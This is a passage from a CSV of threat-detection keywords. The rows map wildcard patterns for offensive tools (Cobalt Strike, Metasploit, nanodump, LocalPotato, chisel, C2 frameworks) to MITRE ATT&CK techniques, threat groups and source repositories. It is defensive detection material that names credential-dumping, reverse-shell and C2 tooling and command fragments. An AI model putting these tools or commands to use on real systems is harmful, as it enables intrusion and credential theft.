Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*lneaocagcijjdpkcabeanfpdbmapcjjg*","greyware_tool_keyword","Hub VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*lnfdmdhmfbimhhpaeocncdlhiodoblbd*","greyware_tool_keyword","VPN PROXY MASTER","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*lnk-generate.py --host * --type ntlm --output *.lnk*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*lnx_keylogger.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*load aggressor script*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" +"*load incognito*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Incognito","10","10","N/A","N/A","N/A","N/A" +"*load kiwi*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Mimikatz","10","10","N/A","N/A","N/A","N/A" +"*load_sc.exe *.bin*","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","0","N/A","10","10","145","25","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z" +"*load_ssp *.dll*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*Load-BeaconParameters*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" +"*Load-Bof(*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" +"*loaddll64.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*loader/inject.c*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*loader/inject_local.c*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*loader/loader/loader.c*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" +"*loader_exe_x64.*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*loader_exe_x86.*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*LoadEWSDLL*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*loadKirbiFile*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*loadliba_reverse_tcp.asm*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*loadliba_shell.asm*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*loadliba_single_shell_reverse_tcp.asm*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*loadmodule *.ps1*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*loadmodume */modules/*.ps1**","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Local: crc32 compensation attack*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*Local:Get-DelegateType*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Local:Get-PEArchitecture*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Local:Get-ProcAddress*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-local=0.0.0.0:4001*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*localexploit_demo_template.erb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*localhost/pipe/pwned*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"*localhost:1337*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*localhost:1337*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*localhost:3000*striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*localhost:31337*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*localhost:3333*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*localhost:4567*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" +"*localhost:4782*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*localhost:53531*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*localhost:8022*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" +"*localhost:8848*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*localpotato -i*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*LocalPotato.cpp*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*LocalPotato.exe*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*LocalPotato.sln*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*LocalPotato.vcxproj*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*LocalPotato.zip*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*LocalPotato-master*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*localreconmodules*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 